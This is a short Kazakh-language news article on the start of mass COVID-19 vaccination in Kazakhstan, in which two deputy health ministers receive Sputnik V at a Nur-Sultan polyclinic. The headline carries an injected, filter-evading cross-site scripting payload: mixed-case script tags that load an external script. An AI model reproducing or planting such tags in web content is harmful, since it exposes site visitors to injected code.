Қазақстанда коронавирустық инфекцияға қарсы жаппай вакцинация басталды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.02.2021

Қазақстанда коронавирустық инфекцияға қарсы жаппай вакцинация басталды

ҚР Денсаулық сақтау вице-министрі – Бас мемлекеттік санитарлық дәрігер Ерлан Қиясов пен денсаулық сақтау вице-министрі Ажар Ғиният Нұр-сұлтанның № 6 қалалық емханасында вакцинаны алғашқылардың бірі болып алды

ҚР Денсаулық сақтау министрлігінің өкілдері ресейлік "Спутник V" вакцинасын алды.

Алдымен олар дәрігердің қарауынан өтті. Тексеру барысында Ерлан Қиясов пен Ажар Гинияттың да қарсы көрсетілімдері болған жоқ. Вакцинаны бірінші болып Ерлан Қиясов, одан кейін Ажар Ғиният алды.

Сондай-ақ, дәрігерлер вакцинациядан кейін қандай шараларды сақтау керектігін еске салды. Осылайша Денсаулық сақтау министрлігінің өкілдері вакцина алды. Содан кейін 30 минут ішінде олар бақылау аймағында болады.

Просмотров: 634


Пікір қосу



Деректерді қолтаңбаға қосу